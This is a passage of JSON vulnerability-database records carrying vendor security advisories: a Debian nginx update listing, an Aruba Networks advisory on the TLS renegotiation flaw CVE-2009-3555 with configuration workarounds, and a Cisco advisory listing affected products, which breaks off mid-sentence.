armel, hppa, i386, ia64, mips, mipsel, powerpc,\r\ns390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2.dsc\r\n Size/MD5 checksum: 1238 41197ff9eca3cb3707ca5eff5e431183\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2.diff.gz\r\n Size/MD5 checksum: 10720 b2c8f555b7de4ac17b2c98247fd2ae6b\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32.orig.tar.gz\r\n Size/MD5 checksum: 522183 c09a2ace3c91f45dabbb608b11e48ed1\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_alpha.deb\r\n Size/MD5 checksum: 297782 dc05cbf94712134298acdedad2a4e85d\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_amd64.deb\r\n Size/MD5 checksum: 268518 58dc10022dd7b20ff58a4b839be62a43\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_arm.deb\r\n Size/MD5 checksum: 251688 7f5a9499de8ba40ae2caea7de183b966\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_hppa.deb\r\n Size/MD5 checksum: 282324 f0264b98d0564f51692292c0ec269a19\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_i386.deb\r\n Size/MD5 checksum: 253060 a64340fa3a9a5b58e23267f13abfeeed\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_ia64.deb\r\n Size/MD5 checksum: 420004 a2e6de141194e41a60893b0b2c457f28\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_mips.deb\r\n Size/MD5 checksum: 283220 04407318230621467ea3a42bfb11d724\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_mipsel.deb\r\n Size/MD5 checksum: 283444 0bd0eb1e415d7d6877a95e21ddb91fa7\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_powerpc.deb\r\n Size/MD5 checksum: 276056 fae6451ab5ac767f93d3229a9e01f3bf\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2_sparc.deb\r\n Size/MD5 checksum: 256778 df6a47fe174736468910a4166fe0a064\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkquZwIACgkQHYflSXNkfP+2zACghwt2Hx3UoREEb7p697sYiPSl\r\npZQAn1WWgFTERwdFo5uw5KuZ7hN09KuH\r\n=Xrul\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-09-15T00:00:00", "published": "2009-09-15T00:00:00", "id": "SECURITYVULNS:DOC:22466", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22466", "title": "[SECURITY] [DSA 1884-1] New nginx packages fix arbitrary code execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-2629"], "description": "Memory corruption on HTTP request URI.", "edition": 1, "modified": "2009-09-15T00:00:00", "published": "2009-09-15T00:00:00", "id": "SECURITYVULNS:VULN:10238", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10238", "title": "nginx proxy server memory corruption", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAruba Networks Security Advisory\r\n\r\nTitle: TLS Protocol Session Renegotiation Security Vulnerability\r\n\r\nAruba Advisory ID: AID-020810\r\nRevision: 1.0\r\n\r\nFor Public Release on 02/08/2010\r\n\r\n+----------------------------------------------------\r\n\r\nSUMMARY\r\n\r\nThis advisory addresses the renegotiation related vulnerability\r\ndisclosed recently in Transport Layer Security protocol [1][2]. This\r\nvulnerability may allow a Man-in-the-Middle (MITM) attacker to inject\r\narbitrary data into the beginning of the application protocol stream\r\nprotected by TLS.\r\n\r\nThe only ArubaOS component that seems affected by this issue is the\r\nHTTPS WebUI administration interface. If a client browser (victim) is\r\nconfigured to authenticate to the WebUI over HTTPS using a client\r\ncertificate, an attacker can potentially use the victim's credentials\r\ntemporarily to execute arbitrary HTTP request for each initiation of an\r\nHTTPS session from the victim to the WebUI. This would happen without\r\nany HTTPS/TLS warnings to the victim. This condition can essentially be\r\nexploited by an attacker for command injection in beginning of a HTTPS\r\nsession between the victim and the ArubaOS WebUI.\r\n\r\nArubaOS itself does not initiate TLS renegotiation at any point and\r\nhence is only vulnerable to scenario where a client explicitly requests\r\nTLS renegotiation. Captive Portal users do not seem vulnerable to this\r\nissue unless somehow client certificates are being used to authenticate\r\ncaptive portal users.\r\n\r\nAFFECTED ArubaOS VERSIONS\r\n\r\n 2.5.6.x, 3.3.2.x, 3.3.3.x, 3.4.0.x, 3.4.1.x, RN 3.1.x, 3.3.2.x-FIPS,\r\n2.4.8.x-FIPS\r\n\r\n\r\nCHECK IF YOU ARE VULNERABLE\r\n\r\nThe only ArubaOS component that seems affected by this issue is the\r\nHTTPS WebUI administration interface. ArubaOS is vulnerable only if its\r\nconfiguration permits WebUI administration interface clients to connect\r\nusing either username/password or client certificates. If only one of\r\nthe two authentication method is allowed, this issue does not seem to apply.\r\n\r\nCheck if the following line appears in your configuration:\r\n \r\n web-server mgmt-auth username/password certificate\r\n\r\nIf the exact line does not appear in the configuration, this issue does\r\nnot apply.\r\n \r\n\r\nDETAILS\r\n\r\nAn industry wide vulnerability was discovered in TLS protocol's\r\nrenegotiation feature, which allows a client and server who already have\r\na TLS connection to negotiate new session parameters and generate new\r\nkey material. Renegotiation is carried out in the existing TLS\r\nconnection. However there is no cryptographic binding between the\r\nrenegotiated TLS session and the original TLS session. An attacker who\r\nhas established MITM between client and server may be able to take\r\nadvantage of this and inject arbitrary data into the beginning of the\r\napplication protocol stream protected by TLS. Specifically arbitrary\r\nHTTP requests can be injected in a HTTPS session where attacker (MITM)\r\nblocks HTTPS session initiation between client and server, establishes\r\nHTTPS session with the server itself, injects HTTP data and initiates\r\nTLS renegotiation with the server. Then attacker allows the\r\nrenegotiation to occur between the client and the server. After\r\nsuccessful HTTPS session establishment with the server, now the client\r\nsends its HTTP request along with its HTTP credentials (cookie) to the\r\nserver. However due to format of attacker's injected HTTP data, the\r\nclient's HTTP request is not processed, rather the attacker's HTTP\r\nrequest gets executed with credentials of the client. The attacker is\r\nnot able to view the results of the injected HTTP request due to the\r\nfact that data between the client and the server is encrypted over\r\nHTTPS.\r\n\r\nArubaOS itself does not initiate TLS renegotiation at any point.\r\n\r\nIMPACT\r\n\r\nThis vulnerability may allow a MITM attacker to inject arbitrary HTTP\r\nrequest data into the beginning of a HTTPS session between client and\r\nserver (ArubaOS WebUI). The only ArubaOS component that seems affected\r\nby this issue is the HTTPS WebUI administration interface.\r\n\r\nPre-requisites for this attack :\r\n 1. The attacker must be able to establish a MITM between the client and\r\nthe server (ArubaOS WebUI).\r\n 2. The attacker must be able to establish a successful HTTPS session\r\nwith the server (ArubaOS WebUI)\r\n 3. ArubaOS must be configured to allow certificate based HTTPS\r\nauthentication for WebUI clients (client certs).\r\n\r\nCaptive Portal users do not seem vulnerable to this issue unless somehow\r\nclient certificates are being used to authenticate captive portal users.\r\n\r\nCVSS v2 BASE METRIC SCORE: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\r\n\r\n\r\nWORKAROUNDS\r\n\r\nAruba Networks recommends that all customers apply the appropriate\r\npatch(es) as soon as practical. However, in the event that a patch\r\ncannot immediately be applied, the following steps will help to mitigate\r\nthe risk:\r\n\r\n- - - Disable certificate based HTTPS authentication (and only allow\r\nusername-password based authentication) for WebUI clients. Client's\r\nusername-password authentication POST request will prohibit attacker's\r\ninjected HTTP data from executing with client's cookie.\r\n CLI command: web-server mgmt-auth username/password\r\n\r\n- - - Permit certificate based HTTPS authentication ONLY and disable\r\nusername-password based authentication to WebUI. This will prohibit\r\nattacker from establishing a HTTPS session with ArubaOS (for MITM)\r\nwithout a valid client cert.\r\n CLI command: web-server mgmt-auth certificate\r\n \r\n Note: This step won't stop command injection from attackers who have\r\nvalid client certificates but their assigned management role privileges\r\nare lower than that of the admin. This attack may allow them to run\r\ncommands at higher privilege than what is permitted in their role.\r\n\r\n- - - Do not expose the Mobility Controller administrative interface to\r\nuntrusted networks such as the Internet.\r\n\r\n\r\n\r\nSOLUTION\r\n\r\nAruba Networks recommends that all customers apply the appropriate\r\npatch(es) as soon as practical.\r\n\r\nThe following patches have the fix (any newer patch will also have the fix):\r\n\r\n- - - - 2.5.6.24\r\n- - - - 3.3.2.23\r\n- - - - 3.3.3.2\r\n- - - - 3.4.0.7\r\n- - - - 3.4.1.1\r\n- - - - RN 3.1.4\r\n\r\nPlease contact Aruba support for obtaining patched FIPS releases.\r\n\r\nPlease note: We highly recommend that you upgrade your Mobility\r\nController to the latest available patch on the Aruba support site\r\ncorresponding to your currently installed release.\r\n\r\n\r\nREFERENCES\r\n\r\n[1] http://extendedsubset.com/?p=8\r\n\r\n[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n\r\n\r\n\r\n\r\n+----------------------------------------------------\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nAruba customers can obtain the firmware on the support website:\r\n http://www.arubanetworks.com/support.\r\n\r\nAruba Support contacts are as follows:\r\n\r\n 1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)\r\n\r\n +1-408-754-1200 (toll call from anywhere in the world)\r\n\r\n e-mail: support(at)arubanetworks.com\r\n\r\nPlease, do not contact either "wsirt(at)arubanetworks.com" or\r\n"security(at)arubanetworks.com" for software upgrades.\r\n\r\n\r\nEXPLOITATION AND PUBLIC ANNOUNCEMENTS\r\n\r\nThis vulnerability will be announced at\r\n\r\nAruba W.S.I.R.T. Advisory:\r\nhttp://www.arubanetworks.com/support/alerts/aid-020810.txt\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Aruba Networks cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Aruba Networks does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Aruba Networks may update\r\nthis advisory.\r\n\r\nA stand-alone copy or paraphrase of the text of this security advisory\r\nthat omits the distribution URL in the following section is an uncontrolled\r\ncopy, and may lack important information or contain factual errors.\r\n\r\n\r\nDISTRIBUTION OF THIS ANNOUNCEMENT\r\n\r\nThis advisory will be posted on Aruba's website at:\r\nhttp://www.arubanetworks.com/support/alerts/aid-020810.txt\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Aruba's worldwide\r\nwebsite, but may or may not be actively announced on mailing lists or\r\nnewsgroups. Users concerned about this problem are encouraged to check the\r\nabove URL for any updates.\r\n\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 02-08-2010 / Initial release\r\n\r\n\r\nARUBA WSIRT SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Aruba Networks\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.arubanetworks.com/support/wsirt.php\r\n\r\n\r\nFor reporting *NEW* Aruba Networks security issues, email can be sent to\r\nwsirt(at)arubanetworks.com or security(at)arubanetworks.com. For sensitive\r\ninformation we encourage the use of PGP encryption. Our public keys can be\r\nfound at\r\n http://www.arubanetworks.com/support/wsirt.php\r\n\r\n\r\n (c) Copyright 2010 by Aruba Networks, Inc.\r\nThis advisory may be redistributed freely after the release date given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.14 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niEYEARECAAYFAktwksYACgkQp6KijA4qefXErQCeKJW3YU3Nl7JY4+2Hp2zqM3bN\r\nbWAAoJWQT+yeWX2q+02hNEwHWQtGf1YP\r\n=CrHf\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-02-10T00:00:00", "published": "2010-02-10T00:00:00", "id": "SECURITYVULNS:DOC:23220", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23220", "title": "Aruba Advisory ID: AID-020810 TLS Protocol Session Renegotiation Security Vulnerability", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "Data injection possibility connected with SSL in-session renegotiation.", "edition": 1, "modified": "2010-02-10T00:00:00", "published": "2010-02-10T00:00:00", "id": "SECURITYVULNS:VULN:10388", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10388", "title": "SSL data injection", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Transport Layer Security Renegotiation\r\nVulnerability\r\n\r\nAdvisory ID: cisco-sa-20091109-tls\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2009 November 9 1600 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nAn industry-wide vulnerability exists in the Transport Layer Security\r\n(TLS) protocol that could impact any Cisco product that uses any version\r\nof TLS and SSL. The vulnerability exists in how the protocol handles\r\nsession renegotiation and exposes users to a potential man-in-the-middle\r\nattack.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nCisco is currently evaluating products for possible exposure to these\r\nTLS issues. Products will only be listed in the Vulnerable Products or\r\nProducts Confirmed Not Vulnerable sections of this advisory when a final\r\ndetermination about product exposure is made. Products that are not\r\nlisted in either of these two sections are still being evaluated.\r\n\r\nVulnerable Products\r\n- -------------------\r\n\r\nThis section will be updated when more information is available.\r\n\r\nProducts Confirmed Not Vulnerable\r\n- ---------------------------------\r\n\r\nThe following products are confirmed not vulnerable:\r\n\r\n * Cisco AnyConnect VPN Client\r\n\r\nThis section will be updated when more information is available.\r\n\r\nDetails\r\n=======\r\n\r\nTLS and its predecessor, SSL, are cryptographic protocols that provide\r\nsecurity for communications over IP data networks such as the Internet.\r\nAn industry-wide vulnerability exists in the TLS protocol that could\r\nimpact any Cisco product that uses any version of TLS and SSL. The\r\nvulnerability exists in how the protocol handles session renegotiation\r\nand exposes users to a potential man-in-the-middle attack.\r\n\r\nThe following Cisco Bug IDs are being used to track potential exposure\r\nto the SSL and TLS issues. The bugs listed below do not confirm\r\nthat a product is vulnerable, but rather that the product is under\r\ninvestigation by the appropriate product teams.\r\n\r\nRegistered Cisco customers can view these bugs via Cisco's Bug Toolkit:\r\nhttp://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl\r\n\r\n+------------------------------------------------------------+\r\n| Product | Bug ID |\r\n|----------------------------+-------------------------------|\r\n| Cisco Adaptive Security | CSCtd01491 |\r\n| Device Manager (ASDM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Software | CSCtd01646 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Healthcare for | CSCtd01652 |\r\n| HIPAA and ePrescription | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application and | CSCtd01529 |\r\n| Content Networking System | |\r\n| (ACNS) Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application | CSCtd01480 |\r\n| Networking Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA 5500 Series | CSCtd00697 |\r\n| Adaptive Security | |\r\n| Appliances | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA Advanced | |\r\n| Inspection and Prevention | CSCtd01539 |\r\n| (AIP) Security Services | |\r\n| Module | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AVS 3100 Series | CSCtd01566 |\r\n| Application Velocity | |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Catalyst 6500 Series | CSCtd06389 |\r\n| SSL Services Module | |\r\n|----------------------------+-------------------------------|\r\n| Firewall Services Module | CSCtd04061 |\r\n| FWSM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco CSS 11000 Series | CSCtd01636 |\r\n| Content Services Switches | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Phones | CSCtd01446 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Center Network | CSCtd02635 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Mobility | CSCtd02642 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01703 |\r\n| Encoders | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01692 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01718 |\r\n| Players | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Emergency Responder | CSCtd02650 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XE Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XR Software | CSCtd02658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IP Communicator | CSCtd02662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| CATOS | CSCtd00662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IronPort Appliances | CSCtd02069 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified MeetingPlace | CSCtd02709 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Appliance (Clean | CSCtd01453 |\r\n| Access) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Guest Server | CSCtd01462 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Profiler | CSCtd02716 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Analysis | CSCtd02729 |\r\n| Module Software (NAM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Registrar | CSCtd02748 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ONS 15500 Series | CSCtd02769 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd02777 |\r\n| Gateways | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd03912 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Security | CSCtd03920 |\r\n| ISM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco QoS Device Manager | CSCtd03923 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Access | CSCtd00725 |\r\n| Control Server (ACS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Desktop | CSCtd03928 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Services | CSCtd03935 |\r\n| Client | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Agent CSA | CSCtd02689 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Monitoring, | CSCtd02654 |\r\n| Analysis and Response | |\r\n| System (MARS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified IP Phones | CSCtd04121 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Service Control | CSCtd04171 |\r\n| Subscriber Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence Manager | CSCtd01771 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Telepresence for Consumer | CSCtd01752 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence | CSCtd01742 |\r\n| Recording Server | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Asset | CSCtd04198 |\r\n| Collector | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified | CSCtd01282 |\r\n| Communications Manager | |\r\n| (CallManager) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Business | CSCtd05731 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Enterprise | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Express | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05755 |\r\n| Center Management Portal | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Products | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Department | CSCtd05733 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified E-Mail | CSCtd05756 |\r\n| Interaction Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Enterprise | CSCtd05735 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobile | CSCtd05762 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05786 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05783 |\r\n| Advantage | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Operations | CSCtd05784 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Personal | CSCtd05759 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Presence | CSCtd05791 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Provisioning | CSCtd05777 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Quick | CSCtd05738 |\r\n| Connect | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CSCtd05780 |\r\n| Monitor | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CStCd05778 |\r\n| Statistics Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Proxy | CSCtd05765 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unity | CSCtd02855 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NX-OS Software | CSCtd00699 and CSCtd00703 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Portal | CSCtd04097 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02831 |\r\n| Media Server Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02780 |\r\n| Operations Manager | |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wide Area File | CSCtd04106 |\r\n| Services Software (WAFS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Control | CSCtd01625 |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless LAN | CSCtd01611 |\r\n| Controller (WLAN) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Location | CSCtd04115 |\r\n| Appliance | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Common Services | CSCtd01597 |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Wireless LAN | CSCtd04111 |\r\n| Solution Engine (WLSE) | |\r\n+------------------------------------------------------------+\r\n\r\nThis vulnerability has been assigned the Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2009-3555.\r\n\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerability in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n* TLS Renegotiation Vulnerability (all Cisco Bugs above)\r\n\r\nCVSS Base Score - 4.3\r\n Access Vector - Network\r\n Access Complexity - Medium\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - None\r\n\r\nCVSS Temporal Score - 4.1\r\n Exploitability - Functional\r\n Remediation Level - Unavailable\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nThis section will be updated when more information is available.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nThis section will be updated to include fixed software versions for\r\naffected Cisco products as they become available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nWorkarounds are being investigated. This section will be updated when\r\nmore information becomes available.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address this\r\nvulnerability. Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature\r\nsets they have purchased. By installing, downloading, accessing\r\nor otherwise using such software upgrades, customers agree to be\r\nbound by the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n- --------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n- -------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n- -----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThis vulnerability was initially discovered by Marsh Ray and Steve\r\nDispensa from PhoneFactor, Inc.\r\n\r\nCisco is not aware of any malicious exploitation of this vulnerability.\r\n\r\nProof-of-concept exploit code has been published for this vulnerability.\r\n\r\nStatus of this Notice: INTERIM\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS 